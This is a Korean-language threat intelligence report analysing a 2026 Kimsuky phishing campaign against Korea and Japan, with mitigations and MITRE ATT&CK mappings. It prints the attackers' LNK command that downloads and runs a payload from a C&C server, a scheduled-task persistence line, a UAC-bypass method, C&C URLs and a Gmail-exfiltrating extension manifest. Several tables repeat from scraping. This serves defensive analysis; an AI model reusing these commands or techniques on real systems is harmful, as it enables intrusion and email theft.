今日表示しない

トップへ戻る

トップへ戻る

동북아시아를 노리는 Kimsuky의 정상 원격 제어 도구 악용 공격 분석 국문 썸네일
동북아시아를 노리는 Kimsuky의 정상 원격 제어 도구 악용 공격 분석 국문 썸네일

脅威インテリジェンス

脅威インテリジェンス

脅威インテリジェンス

Kimsuky

Kimsuky

Kimsuky

엔키화이트햇

엔키화이트햇

コンテンツ

コンテンツ

コンテンツ

요약

  • 2026년 상반기 한국과 일본을 대상으로 한 Kimsuky의 스피어피싱 공격 캠페인을 다수 식별하였다.

  • 공격자는 OneDrive 공유 링크가 포함된 피싱 이메일로 LNK 악성코드를 유포하였으며, 실행 시 C&C 서버의 파워쉘 스크립트를 주기적으로 내려받아 실행하는 작업이 등록된다.

  • 유포된 파워쉘 스크립트는 시스템 정보 조회, Thunderbird 및 Outlook 메일 수집, 키로깅 등 정보 탈취 기능을 수행하였다.

  • 공격자는 크롬 원격 데스크톱과 AnyDesk 등 합법 원격 제어 도구를 설치해 백신 탐지를 우회하고 다중 원격 제어 경로를 확보하였다.

  • Gmail 데이터를 자동으로 유출하는 악성 크롬 확장 프로그램에서는 코드 전반에 걸쳐 한국어 주석과 디버깅 문자열, 유니코드 이모지 등 생성형 AI로 작성된 정황이 다수 확인되었다.

1. 개요

엔키화이트햇 위협연구팀은 한국과 일본을 대상으로 한 Kimsuky의 최신 스피어피싱 사례를 다수 식별하였다. 공격자는 OneDrive 공유 링크가 포함된 피싱 이메일로 악성코드를 유포하였으며, 침투 이후에는 파워쉘 스크립트와 합법 원격 제어 도구를 악용해 데이터를 유출하고 피해 시스템을 제어하였다.

공격 개요도

caption - 공격 개요도

공격자는 짧은 주기로 악성코드의 C&C 서버를 변경하고 정상 한국 서버를 침해해 C&C 서버로 악용하는 등 추적을 어렵게 하는 인프라 운용 전략을 사용하였다. 또한 Gmail 유출에 사용된 악성 크롬 확장 프로그램의 코드에서는 한국어로 작성된 상세한 주석과 디버깅 문자열, 유니코드 이모지 등 생성형 AI로 작성된 코드의 특징이 다수 확인되었다.공격자는 악성코드 압축파일을 OneDrive에 업로드하고, 해당 파일의 공유 링크가 포함된 피싱 이메일을 피해자에게 전송하였다. 확보한 일본 피해자 타겟 이메일에서는 "자료를 보내드리겠습니다. 확인 부탁드립니다."라는 일본어 문구와 함께 OneDrive 링크가 전송된 것이 확인되었다.

2. 초기 침투

공격자는 악성코드 압축파일을 OneDrive에 업로드하고, 해당 파일의 공유 링크가 포함된 피싱 이메일을 피해자에게 전송하였다. 확보한 일본 피해자 타겟 이메일에서는 "자료를 보내드리겠습니다. 확인 부탁드립니다."라는 일본어 문구와 함께 OneDrive 링크가 전송된 것이 확인되었다.

일본어 피싱 이메일

caption - 일본어 피싱 이메일

OneDrive에 업로드된 압축 파일

caption - OneDrive에 업로드된 압축 파일

압축 파일에는 習氏は何をしに平壌に行ったのか.lnk가 포함되어 있다. LNK 파일 실행 시 아래와 같은 숨겨진 파워쉘 명령어가 실행되어 C&C 서버에 접속해 미끼 문서를 표시하고 악성코드 logo.png%appdata%\bot.vbe 경로에 생성하고 실행한다.

  • 파워쉘 명령어: /c mode 15,1 & explorer.exe hxxp://103.77.242[.]187/JINF.pdf & curl hxxp://103.77.242[.]187/logo.png -o %appdata%\bot.vbe & %appdata%\bot.vbe & exit

해당 공격에 사용된 미끼 문서 JINF.pdf의 내용은 아래와 같으며, 일본 국가기본문제연구소 소속 교수가 발표한 칼럼으로 확인되었다.

일본어로 작성된 미끼 문서

caption - 일본어로 작성된 미끼 문서

실행되는 VBE 파일을 디코딩하면 문자열 치환 난독화가 적용된 VBScript가 나타난다. VBScript는 C&C 서버에 MAC 주소를 인자로 요청을 전송하고 응답으로 전달된 파워쉘 스크립트를 메모리에서 즉시 실행한다. 요청을 보내는 URL과 난독화된 VBScript는 아래와 같다.

  • URL: hxxp://103.77.242[.]187/view.php?type=apple&seed=<MAC주소>

문자열 치환 난독화가 적용된 VBScript

caption - 문자열 치환 난독화가 적용된 VBScript

C&C 서버로의 첫 요청 시 응답으로 돌아오는 파워쉘 스크립트는 앞서 생성된 bot.vbe를 15분 주기로 실행하는 작업을 "Chrome\_Update"라는 이름으로 등록한다. 이후 공격자는 C&C 서버에서 피해 시스템으로 전달되는 파워쉘 스크립트를 수정하여 해당 시스템을 원격 제어하는 것으로 확인되었다. 첫 요청 시 전달되는 작업 등록 파워쉘 스크립트는 아래와 같다.

  • 작업 등록 파워쉘 스크립트: schtasks /create /TN Chrome_Update /TR "C:\Windows\System32\wscript.exe /b ""%appdata%\bot.vbe""" /SC MINUTE /mo 15 /f exit

분석 과정에서 동일한 형식의 내부 명령어를 실행하는 악성 LNK 파일이 담긴 압축 파일을 다수 확보하였다. 공격 흐름과 활동 시기는 모두 유사하나, 공격자는 후속 페이로드를 다운로드하는 C&C 서버를 공격 사례마다 새롭게 구축하였다. 수집된 악성코드 유포 압축파일 정보는 아래 표와 같다.

| 압축 파일명 | LNK 파일명 | LNK MD5 | C&C 서버 |
| --- | --- | --- | --- |
| pattern.zip | 5月9日資料.pdf.lnk | e7da02737751f2f171aed28694b9554e | 160.187.147[.]119 |
| 米国のホルムズ逆封鎖は中国に効いている.zip | 米国のホルムズ逆封鎖は中国に効いている.lnk | a2191f29f58b9f0cb576b7459ed6680d | 84.247.145[.]65 |
| SDD_2026.zip | Directions and Parking information.lnk | 5b49177d14f073bd7abf4c94688ebd84 | 210.183.177[.]217:8080 |
| SDD_2026.zip | Invitation to SDD 2026 Breifing Session.lnk | 4c5474238c4b2ec2ca0698902c084624 | 210.183.177[.]217:8080

| 압축 파일명 | LNK 파일명 | LNK MD5 | C&C 서버 |
| --- | --- | --- | --- |
| pattern.zip | 5月9日資料.pdf.lnk | e7da02737751f2f171aed28694b9554e | 160.187.147[.]119 |
| 米国のホルムズ逆封鎖は中国に効いている.zip | 米国のホルムズ逆封鎖は中国に効いている.lnk | a2191f29f58b9f0cb576b7459ed6680d | 84.247.145[.]65 |
| SDD_2026.zip | Directions and Parking information.lnk | 5b49177d14f073bd7abf4c94688ebd84 | 210.183.177[.]217:8080 |
| SDD_2026.zip | Invitation to SDD 2026 Breifing Session.lnk | 4c5474238c4b2ec2ca0698902c084624 | 210.183.177[.]217:8080

| 압축 파일명 | LNK 파일명 | LNK MD5 | C&C 서버 |
| --- | --- | --- | --- |
| pattern.zip | 5月9日資料.pdf.lnk | e7da02737751f2f171aed28694b9554e | 160.187.147[.]119 |
| 米国のホルムズ逆封鎖は中国に効いている.zip | 米国のホルムズ逆封鎖は中国に効いている.lnk | a2191f29f58b9f0cb576b7459ed6680d | 84.247.145[.]65 |
| SDD_2026.zip | Directions and Parking information.lnk | 5b49177d14f073bd7abf4c94688ebd84 | 210.183.177[.]217:8080 |
| SDD_2026.zip | Invitation to SDD 2026 Breifing Session.lnk | 4c5474238c4b2ec2ca0698902c084624 | 210.183.177[.]217:8080

caption - 추가 악성코드 정보

확보한 LNK 파일 중에는 미끼 문서로 한국 행사 관련 문서를 사용한 파일도 확인되어 같은 공격자가 일본부터 한국까지 넓은 영역을 대상으로 공격을 진행하고 있음을 알 수 있다. 또한 국내 정상 웹사이트인 210.183.177[.]217를 C&C 서버로 사용하는 악성코드가 확인되어 공격자가 정상 한국 서버를 침해하고 이를 C&C 서버로 악용하고 있다는 사실이 확인되었다.

3. 악성코드 분석

3.1. 파워쉘 스크립트

초기 침투 과정에서 작업으로 등록된 VBE 악성코드는 C&C 서버에서 파워쉘 스크립트를 다운로드해 실행한다. 유포된 파워쉘 스크립트는 시스템 정보 유출이나 키로깅 등 직접적인 악성 행위를 하는 유형과, 크롬 원격 데스크톱이나 AnyDesk 등 원격 제어 도구를 설치하는 유형으로 나뉜다. 후자는 각 도구의 분석 섹션에서 함께 다룬다.

3.1.1. 시스템 정보 유출 스크립트

작업 등록 이후 처음으로 유포 및 실행되는 파워쉘 스크립트는 피해 시스템에 설치된 보안 프로그램과 시스템 정보를 조회해 결과를 C:\users\public\music\aaa.tmp 경로에 저장한다. 이후 추출된 정보를 Base64 인코딩 후 "="를 "%"로 치환해 아래 URL로 POST 전송한다.

  • 파일 유출 C&C 서버: hxxp://103.77.242[.]187/receive.php

시스템 정보 유출 스크립트

caption - 시스템 정보 유출 스크립트

3.1.2. 이메일 수집 스크립트

공격자는 로컬 메일함에서 메일 데이터를 수집하는 스크립트를 유포하였다. 확인된 메일 유출 스크립트는 메일 서비스 기준 2종으로, 각각 Thunderbird와 Outlook 메일 데이터를 수집한다. Thunderbird 이메일 수집 스크립트는 로컬에 mbox 포맷으로 저장된 이메일 아카이브 파일에서 From - \* 문자열을 기준으로 메일을 하나씩 추출해 eml 파일로 저장한다.

Thunderbird 이메일 수집 스크립트 1

caption - Thunderbird 이메일 수집 스크립트 1

수신함에서는 약 55MB 분량의 최신 메일 데이터를 추출하여 C:\Users\Public\Music\Inbox\ 경로에 저장한다. 보낸 편지함에서는 약 100MB 분량의 최신 메일 데이터를 읽고 C:\Users\Public\Music\Sent\ 경로에 저장한다.

Thunderbird 이메일 수집 스크립트 2

caption - Thunderbird 이메일 수집 스크립트 2

Outlook 이메일 수집 스크립트는 로컬 수신함 및 보낸 편지함에서 2026년 1월 1일 이후의 모든 이메일을 수집하고 첨부 파일을 분리하여 C:\users\public\music\mail\ 경로에 저장한다.

Outlook 이메일 수집 스크립트 1

caption - Outlook 이메일 수집 스크립트 1

해당 스크립트는 계정 이름으로 하위 디렉토리를 생성하여 저장 경로를 분류한다. 이메일 본문 및 메타데이터는 개별 eml 파일이 아닌 계정별 email.csv 파일에 일괄적으로 저장하고, 첨부파일은 메일 본문과 분리하여 계정별 attachment\ 디렉토리에 저장한다.

Outlook 이메일 수집 스크립트 2

caption - Outlook 이메일 수집 스크립트 2

3.1.3. 키로거 스크립트

분석 과정에서 공격자가 피해자의 비밀번호 등 키 입력 정보를 탈취하기 위해 사용한 키로거 스크립트가 확인되었다. 유포된 키로거 스크립트는 인라인된 C# 코드를 메모리에서 직접 컴파일해 실행한다. 해당 C# 코드는 키보드 입력을 후킹해 모든 키 입력 내용을 %appdata%\Microsoft\ttmp1.log 경로에 저장한다.

키로거 스크립트 1

caption - 키로거 스크립트 1

키로거 스크립트에서 C&C 서버 전송 기능은 확인되지 않았으며, 추가 스크립트를 이용해 수집된 키로그 파일을 C&C 서버에 업로드했을 것으로 추정된다. 스크립트 내 C# 코드에서는 Masakoyoji.Komori라는 네임스페이스 이름이 확인되었다.

키로거 스크립트 2

caption - 키로거 스크립트 2

3.2. 크롬 원격 데스크톱

공격자는 침해한 피해 서버에 크롬 원격 데스크톱을 설치하여 GUI 원격 제어를 수행하였다. 확보한 크롬 원격 데스크톱 설치 스크립트가 설치하는 파일 정보는 아래 표와 같다.

| 설치 경로 | URL | 파일 설명 |
| --- | --- | --- |
| c:\users\public\music\1.msi | hxxp://dl[.]google[.]com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi | 공식 크롬 원격 데스크톱 설치파일 |
| c:\users\public\music\1.bat | hxxp://103.249.117[.]183/1.bat | 크롬 원격 데스크톱 설치 및 공격자 계정 바인딩 배치 파일 |
| 설치 경로 | URL | 파일 설명 |
| --- | --- | --- |
| c:\users\public\music\1.msi | hxxp://dl[.]google[.]com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi | 공식 크롬 원격 데스크톱 설치파일 |
| c:\users\public\music\1.bat | hxxp://103.249.117[.]183/1.bat | 크롬 원격 데스크톱 설치 및 공격자 계정 바인딩 배치 파일 |
| 설치 경로 | URL | 파일 설명 |
| --- | --- | --- |
| c:\users\public\music\1.msi | hxxp://dl[.]google[.]com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi | 공식 크롬 원격 데스크톱 설치파일 |
| c:\users\public\music\1.bat | hxxp://103.249.117[.]183/1.bat | 크롬 원격 데스크톱 설치 및 공격자 계정 바인딩 배치 파일 |

caption - 크롬 원격 데스크톱 설치 관련 파일 목록

설치 스크립트는 fodhelper.exe를 이용해 UAC를 우회하고 관리자 권한으로 C&C 서버에서 다운로드한 배치 파일을 실행한다. fodhelper.exe는 UAC 프롬프트 없이 관리자 권한으로 실행되는 윈도우 바이너리인데, 실행 시 ms-settings 프로토콜 핸들러를 참조한다. 윈도우는 이 과정에서 HKCU\Software\Classes 보다 HKCU\Software\Classes를 우선 참조한다.

이때 HKCU\Software\Classes 경로의 레지스트리는 일반 사용자도 수정이 가능하기 때문에 ms-settings에 Curver 체이닝을 설정하여 최종적으로 .fax\Shell\Open\command1.bat를 가리키도록 구성하면, fodhelper.exe 실행 시 UAC 우회와 함께 1.bat가 관리자 권한으로 실행된다.

fodhelper.exe를 이용한 UAC 우회 루틴

caption - fodhelper.exe를 이용한 UAC 우회 루틴

UAC 우회 이후 관리자 권한으로 실행되는 1.bat는 이미 설치된 크롬 원격 데스크톱 설치 파일인 1.msi를 실행하고, 크롬 원격 데스크톱을 시작한다. 바인딩 시 인증 데이터로 사용되는 명령줄 인자는 아래 표와 같다.

| 명령줄 인자 |  |
| --- | --- |
| code | 4/0AdkVLPzBKUSDVADc4Ru8idnLfXfKe6n0fpQrCTSXpbc3V5PSKEafp952MzQsKmOEr-bPGQ |
| redirect-url | hxxps://remotedesktop.google[.]com/\_/oauthredirect |
| name | okuta |
| pin | 001100

| 명령줄 인자 |  |
| --- | --- |
| code | 4/0AdkVLPzBKUSDVADc4Ru8idnLfXfKe6n0fpQrCTSXpbc3V5PSKEafp952MzQsKmOEr-bPGQ |
| redirect-url | hxxps://remotedesktop.google[.]com/\_/oauthredirect |
| name | okuta |
| pin | 001100

| 명령줄 인자 |  |
| --- | --- |
| code | 4/0AdkVLPzBKUSDVADc4Ru8idnLfXfKe6n0fpQrCTSXpbc3V5PSKEafp952MzQsKmOEr-bPGQ |
| redirect-url | hxxps://remotedesktop.google[.]com/\_/oauthredirect |
| name | okuta |
| pin | 001100

caption - 크롬 원격 데스크톱 바인딩 명령줄 인자

크롬 원격 데스크톱 설치 스크립트는 배치 파일 실행 후 크롬 원격 데스크톱이 제대로 설치되었는지 확인하기 위해 C:\Program Files (x86)\Google 경로의 디렉토리 리스팅 결과를 C:\users\public\music\bbb.tmp에 저장한다. bbb.tmp는 Base64 인코딩 후 "="를 "%"로 치환해 아래 URL의 C&C 서버로 POST 전송된다.

  • C&C 서버 URL: hxxp://103.249.117[.]183/receive.php

3.3. Gmail 유출 크롬 확장 프로그램

공격자는 피해자의 Gmail 데이터를 자동으로 C&C 서버에 전송하는 악성 크롬 확장 프로그램을 설치하였다. 확장 프로그램을 구성하는 Javascript와 JSON 파일 전반에 걸쳐 상세한 한글 설명 및 디버깅 문자열이 포함되어 있어 공격자가 대부분의 코드를 생성형 AI로 작성했을 것으로 강하게 추정된다. 확보한 크롬 확장 프로그램의 manifest.json 파일은 아래와 같다.

{
  "manifest_version": 3,
  "name": "Gmail 자동 서버 업로더",
  "version": "2.2",
  "description": "새로 읽은 Gmail 이메일과 첨부파일을 안전한 HTTPS 서버로 전송합니다.",
  "permissions": [],
  "host_permissions": [
    "<all_urls>"
  ],
  "content_scripts": [
    {
      "matches": [
        "<all_urls>"
      ],
      "js": [
        "content.js"
      ]
    }
  ],
  "background": {
    "service_worker": "background.js"

{
  "manifest_version": 3,
  "name": "Gmail 자동 서버 업로더",
  "version": "2.2",
  "description": "새로 읽은 Gmail 이메일과 첨부파일을 안전한 HTTPS 서버로 전송합니다.",
  "permissions": [],
  "host_permissions": [
    "<all_urls>"
  ],
  "content_scripts": [
    {
      "matches": [
        "<all_urls>"
      ],
      "js": [
        "content.js"
      ]
    }
  ],
  "background": {
    "service_worker": "background.js"

{
  "manifest_version": 3,
  "name": "Gmail 자동 서버 업로더",
  "version": "2.2",
  "description": "새로 읽은 Gmail 이메일과 첨부파일을 안전한 HTTPS 서버로 전송합니다.",
  "permissions": [],
  "host_permissions": [
    "<all_urls>"
  ],
  "content_scripts": [
    {
      "matches": [
        "<all_urls>"
      ],
      "js": [
        "content.js"
      ]
    }
  ],
  "background": {
    "service_worker": "background.js"

확장 프로그램의 동작은 content.js, background.js 2개의 Javascript 파일로 분리되어 있다.

먼저 content.js는 Gmail 페이지 내부에서 작동하며 "보내기" 버튼과 메일 열람 화면을 감시한다. 감시 중 "보내기" 버튼을 누르면 작성 창에서 수신인, 제목, 본문, 첨부파일을 추출해 백그라운드에 전달한다. 첨부파일은 fetch를 통해 링크에서 다운로드한 뒤 Base64 인코딩하여 백그라운드에 전달한다.

보낸 Gmail 수집 루틴

caption - 보낸 Gmail 수집 루틴

감시 중 메일 열람 화면이 나타나면 발신자, 제목, 본문, 첨부파일을 추출해 백그라운드에 전달한다. fetch를 이용한 첨부파일 추출 및 전달 과정은 메일 발신 시 탈취 과정과 동일하다.

읽은 Gmail 수집 루틴

caption - 읽은 Gmail 수집 루틴

background.js는 백그라운드에서 동작하며 content.js가 전달한 이메일 데이터를 C&C 서버로 전송한다. 이메일 본문과 첨부파일은 type 파라미터를 통해 구분하며, 일본의 무료 호스팅 서버가 C&C 서버로 사용되었다.

  • C&C 서버: hxxps://sweet-iki-4263.holy[.]jp/gmail.php

Gmail 데이터 C&C 서버 전송 루틴

caption - Gmail 데이터 C&C 서버 전송 루틴

3.4. AnyDesk

분석 중 원격 제어 도구인 AnyDesk를 설치 및 실행하는 배치 스크립트가 확인되었다. AnyDesk는 크롬 원격 데스크톱과 마찬가지로 합법적인 원격 제어 도구이지만, Kimsuky를 포함한 여러 위협 행위자들이 탐지 우회 및 원격 제어에 악용하는 것으로 알려져 있다. 확보한 배치 스크립트는 아래와 같다.

AnyDesk 설치에 사용된 배치 스크립트

caption - AnyDesk 설치에 사용된 배치 스크립트

배치 스크립트는 앞서 추가 악성코드로 소개하였던 5月9日資料.pdf.lnk가 통신하는 C&C 서버인 160.187.147[.]119에서 AnyDesk 설치를 위한 추가 파일들을 다운로드한다. 각 파일 별 정보는 아래 표와 같다.

| 파일명 | 설명 |
| --- | --- |
| app.vmd | default_an.ps1을 실행하는 VBScript |
| mnfst.vmd | AnyDesk를 실행 은닉하는 파워쉘 스크립트 |
| attach.vmd | 정상 AnyDesk 실행 파일 |
| sch.vmd | AnyDesk 인증서, 비밀번호 솔트 |
| vpost.vmd | AnyDesk 연결 정보 |
| bimage.vmd | default_an.vbs를 실행하는 작업 XML 파일

| 파일명 | 설명 |
| --- | --- |
| app.vmd | default_an.ps1을 실행하는 VBScript |
| mnfst.vmd | AnyDesk를 실행 은닉하는 파워쉘 스크립트 |
| attach.vmd | 정상 AnyDesk 실행 파일 |
| sch.vmd | AnyDesk 인증서, 비밀번호 솔트 |
| vpost.vmd | AnyDesk 연결 정보 |
| bimage.vmd | default_an.vbs를 실행하는 작업 XML 파일

| 파일명 | 설명 |
| --- | --- |
| app.vmd | default_an.ps1을 실행하는 VBScript |
| mnfst.vmd | AnyDesk를 실행 은닉하는 파워쉘 스크립트 |
| attach.vmd | 정상 AnyDesk 실행 파일 |
| sch.vmd | AnyDesk 인증서, 비밀번호 솔트 |
| vpost.vmd | AnyDesk 연결 정보 |
| bimage.vmd | default_an.vbs를 실행하는 작업 XML 파일

caption - AnyDesk 설치 관련 파일 목록

배치 스크립트는 bimage.vmd에 정의된 작업 정보를 이용해 User\_Feed\_Synchronization-{0DDC1BD9-E733-425C-B92B-ABAC149AB11232}라는 이름의 예약 작업을 등록한다. 이 작업은 5분 주기로 default\_an.vbs를 실행하며, default\_an.vbs는 다시 default\_an.ps1을 호출한다. default\_an.ps1MyAnyMutexName 뮤텍스로 중복 실행을 방지한 뒤 AnyDesk를 실행하고, 아래 단계에 따라 은닉한다.

  1. 모든 창 이름을 탐색해 제목에 anydesk, Windows Security Alert, Windows 보안 경고가 포함된 창을 모두 숨김 처리한다.

  2. 작업 표시줄의 AnyDesk 버튼을 제거한다.

  3. 시스템 트레이 영역을 탐색해 AnyDesk 아이콘을 제거한다.

4. Kimsuky와의 연관성

본 보고서에서 분석된 공격 캠페인은 과거 Kimsuky의 공격 사례와 다수의 공격 도구와 TTP를 공유한다. 크롬 확장 프로그램을 악용한 메일 탈취 방식은 과거 한독(韓獨) 합동 사이버 보안 권고에서 분석된 Kimsuky의 공격 사례에서도 확인된 바 있다.

caption - 한독 합동 사이버 보안 권고문 (사진 출처: https://www.verfassungsschutz.de/SharedDocs/publikationen/EN/economic-and-scientific-protection/2023-03-20-joint-cyber-security-advisory-korean.pdf?__blob=publicationFile&v=1)

침투 이후 피해자 PC에 AnyDesk를 설치하는 과정에서 사용된 스크립트들은 2025년 Kimsuky의 AnyDesk 유포 공격에 사용되었던 스크립트들과 동일한 동작 흐름, 파일명, 저장 경로를 보여준다. 2025년 사례와의 세부 항목 비교 내용은 아래 표와 같다.

| **항목** | 보고서 사례 | 2025사례 |
| --- | --- | --- |
| C&C 서버 파일명 | app.vmd, mnfst.vmd, attach.vmd, sch.vmd, vpost.vmd, bimage.vmd | myapp, mnfst, attach, sch_0, vpost, bimage |
| 스크립트 저장 경로 | %appdata%\microsoft\windows\ | %appdata%\microsoft\windows\ |
| 파일명 | default_an.<확장자>, service.conf, system.conf | default_an.<확장자>, service.conf, system.conf

| **항목** | 보고서 사례 | 2025사례 |
| --- | --- | --- |
| C&C 서버 파일명 | app.vmd, mnfst.vmd, attach.vmd, sch.vmd, vpost.vmd, bimage.vmd | myapp, mnfst, attach, sch_0, vpost, bimage |
| 스크립트 저장 경로 | %appdata%\microsoft\windows\ | %appdata%\microsoft\windows\ |
| 파일명 | default_an.<확장자>, service.conf, system.conf | default_an.<확장자>, service.conf, system.conf

| **항목** | 보고서 사례 | 2025사례 |
| --- | --- | --- |
| C&C 서버 파일명 | app.vmd, mnfst.vmd, attach.vmd, sch.vmd, vpost.vmd, bimage.vmd | myapp, mnfst, attach, sch_0, vpost, bimage |
| 스크립트 저장 경로 | %appdata%\microsoft\windows\ | %appdata%\microsoft\windows\ |
| 파일명 | default_an.<확장자>, service.conf, system.conf | default_an.<확장자>, service.conf, system.conf

caption - AnyDesk 설치 관련 파일 비교

TTP 측면에서 일본을 대상으로 한 공격은 한국뿐만 아니라 중국, 일본, 러시아 등 주변국을 대상으로도 첩보 활동을 수행해 온 Kimsuky의 기존 활동 범위와도 일치한다. 동시에 피싱 메일을 통해 악성 LNK 파일을 유포하는 초기 침투 방식은 Kimsuky를 비롯한 북한 배후 위협 행위자들이 자주 채택하는 것으로 잘 알려져 있다.

추가로 분석 과정에서 확보한 크롬 확장 프로그램의 Javascript에는 상세 주석과 디버깅 문자열, 심지어 탈취된 이메일 데이터와 함께 기록되는 안내 문구까지 한글이 사용되었다. 이는 사용자의 언어를 답변 생성에 적극 참고하는 생성형 AI의 특징이 잘 드러난 지점으로 볼 수 있다. 따라서 공격자가 한글 및 한국어에 익숙한 공격자일 가능성이 매우 높으며, 이는 북한 배후 공격 그룹인 Kimsuky와의 연결고리를 더욱 강화한다.

악성 크롬 확장 프로그램 Javascript의 한글 주석

caption - 악성 크롬 확장 프로그램 Javascript의 한글 주석

악성 크롬 확장 프로그램 Javascript의 한글 디버깅 문자열

caption - 악성 크롬 확장 프로그램 Javascript의 한글 디버깅 문자열

5. 대응 방안

5.1. 출처가 불분명한 링크 및 파일 주의

초기 침투에 사용된 LNK 확장자 파일은 Windows 파일 탐색기의 "파일 확장명" 표시 옵션을 활성화하여도 파일 확장명이 표시되지 않는다. 그러나 파일 아이콘에 바로 가기 파일임을 나타내는 화살표 아이콘이 나타나므로, 웹에서 다운로드한 파일에서 해당 아이콘이 확인되는 경우 되도록 실행하지 않고 VirusTotal이나 백신 프로그램을 통해 파일의 악성 여부를 확인해야 한다.

SDD_2026.zip에 압축된 LNK 파일

caption - SDD_2026.zip에 압축된 LNK 파일

5.2. 원격 제어 도구 자가 진단

공격에 악용된 크롬 원격 데스크톱, 크롬 확장 프로그램, AnyDesk와 같은 합법 소프트웨어는 일반 사용자들 사이에서도 널리 사용되기 때문에 백신 프로그램이 악성코드로 탐지하지 않는다. 따라서 시스템에 설치 및 악용되는 소프트웨어와 프로세스를 정기적으로 직접 확인하는 습관이 필요하다. 본 보고서에서 분석된 공격 사례의 자가 진단 방법은 아래 표 같다.

| 점검 대상 | 확인 위치 | 의심 징후 |
| --- | --- | --- |
| 예약 작업 | 작업 스케줄러 (taskschd.msc) | wscript.exe, powershell.exe를 실행하는 본인이 등록하지 않은 작업 |
| 크롬 원격 데스크톱 | chrome://apps, C:\Program Files (x86)\Google | 본인이 설치하지 않은 원격 데스크톱 활성화 |
| 크롬 확장 프로그램 | chrome://extensions | 본인이 설치하지 않은 확장 프로그램, <all_urls> 등 과도한 권한 |
| AnyDesk | 작업 관리자, %appdata% 경로 | AnyDesk 관련 프로세스 또는 파일 존재

| 점검 대상 | 확인 위치 | 의심 징후 |
| --- | --- | --- |
| 예약 작업 | 작업 스케줄러 (taskschd.msc) | wscript.exe, powershell.exe를 실행하는 본인이 등록하지 않은 작업 |
| 크롬 원격 데스크톱 | chrome://apps, C:\Program Files (x86)\Google | 본인이 설치하지 않은 원격 데스크톱 활성화 |
| 크롬 확장 프로그램 | chrome://extensions | 본인이 설치하지 않은 확장 프로그램, <all_urls> 등 과도한 권한 |
| AnyDesk | 작업 관리자, %appdata% 경로 | AnyDesk 관련 프로세스 또는 파일 존재

| 점검 대상 | 확인 위치 | 의심 징후 |
| --- | --- | --- |
| 예약 작업 | 작업 스케줄러 (taskschd.msc) | wscript.exe, powershell.exe를 실행하는 본인이 등록하지 않은 작업 |
| 크롬 원격 데스크톱 | chrome://apps, C:\Program Files (x86)\Google | 본인이 설치하지 않은 원격 데스크톱 활성화 |
| 크롬 확장 프로그램 | chrome://extensions | 본인이 설치하지 않은 확장 프로그램, <all_urls> 등 과도한 권한 |
| AnyDesk | 작업 관리자, %appdata% 경로 | AnyDesk 관련 프로세스 또는 파일 존재

caption - 자가 진단 방법

6. 마치며

본 보고서는 동북아시아를 타겟으로 피싱 이메일을 통해 악성코드를 유포한 Kimsuky의 최신 공격 사례를 분석하였다. 피해자가 유포된 LNK 악성코드를 실행하면 주기적으로 C&C 서버에서 악성 파워쉘 스크립트를 설치 및 실행하는 작업이 등록되고, 공격자는 피해 시스템에 대한 원격 제어권을 확보하게 된다.

공격자가 Gmail 유출에 사용한 크롬 확장 프로그램의 JavaScript에서는 코드 전반에 걸쳐 정형화된 형태의 과도하게 상세한 주석과 디버깅 문자열, 유니코드 이모지가 확인되었다. 이는 공격자가 코드의 상당 부분을 직접 작성하는 대신 생성형 AI로 생성한 뒤 곧바로 공격에 투입하고 있음을 시사하며, 수작업으로 개발할 때보다 빠른 속도로 공격 도구를 제작하고 교체할 수 있게 되었음을 의미한다.

공격자는 침투에 성공한 시스템에 여러 원격 제어 수단을 설치하여, 이들 중 일부가 탐지 및 제거되어도 지속적으로 시스템을 제어할 수 있도록 하였다. 공격자는 이 과정에서 크롬 원격 데스크톱, AnyDesk와 같은 합법 소프트웨어를 사용하여 탐지를 우회하였다. 이러한 유형의 공격에 대응하기 위해서는 백신 프로그램에만 의존하지 않고, 직접 설치된 프로그램 목록, 예약 작업, 브라우저 확장 프로그램 등을 정기적으로 점검하여 비인가 원격 제어 도구의 설치 여부를 확인해야 한다.

7. 부록

부록 A. MITRE ATT&CK

| Tactics | Techniques |
| --- | --- |
| Initial Access | T1566.002: Phishing: Spearphishing Link |
| Execution | T1059.001: Command and Scripting Interpreter: PowerShell-nT1059.003: Command and Scripting Interpreter: Windows Command Shell-nT1059.005: Command and Scripting Interpreter: Visual Basic-nT1204.002: User Execution: Malicious File |
| Persistence | T1053.005: Scheduled Task/Job: Scheduled Task |
| Privilege Escalation | T1548.002: Abuse Elevation Control Mechanism: Bypass User Account Control |
| Stealth | T1027.013: Obfuscated Files or Information: Encrypted/Encoded File-nT1140: Deobfuscate/Decode Files or Information-nT1564: Hide Artifacts-nT1070: Indicator Removal |
| Discovery | T1010: Application Window Discovery-nT1012: Query Registry-nT1082: System Information Discovery-nT1083: File and Directory Discovery-nT1518.001: Software Discovery: Security Software Discovery |
| Collection | T1005: Data from Local System-nT1056.001: Input Capture: Keylogging-nT1114: Email Collection |
| Command and Control | T1071.001: Application Layer Protocol: Web Protocols-nT1132.001: Data Encoding: Standard Encoding-nT1219: Remote Access Tools-nT1573.001: Encrypted Channel: Symmetric Cryptography |
| Exfiltration | T1041: Exfiltration Over C2 Channel

| Tactics | Techniques |
| --- | --- |
| Initial Access | T1566.002: Phishing: Spearphishing Link |
| Execution | T1059.001: Command and Scripting Interpreter: PowerShell-nT1059.003: Command and Scripting Interpreter: Windows Command Shell-nT1059.005: Command and Scripting Interpreter: Visual Basic-nT1204.002: User Execution: Malicious File |
| Persistence | T1053.005: Scheduled Task/Job: Scheduled Task |
| Privilege Escalation | T1548.002: Abuse Elevation Control Mechanism: Bypass User Account Control |
| Stealth | T1027.013: Obfuscated Files or Information: Encrypted/Encoded File-nT1140: Deobfuscate/Decode Files or Information-nT1564: Hide Artifacts-nT1070: Indicator Removal |
| Discovery | T1010: Application Window Discovery-nT1012: Query Registry-nT1082: System Information Discovery-nT1083: File and Directory Discovery-nT1518.001: Software Discovery: Security Software Discovery |
| Collection | T1005: Data from Local System-nT1056.001: Input Capture: Keylogging-nT1114: Email Collection |
| Command and Control | T1071.001: Application Layer Protocol: Web Protocols-nT1132.001: Data Encoding: Standard Encoding-nT1219: Remote Access Tools-nT1573.001: Encrypted Channel: Symmetric Cryptography |
| Exfiltration | T1041: Exfiltration Over C2 Channel

| Tactics | Techniques |
| --- | --- |
| Initial Access | T1566.002: Phishing: Spearphishing Link |
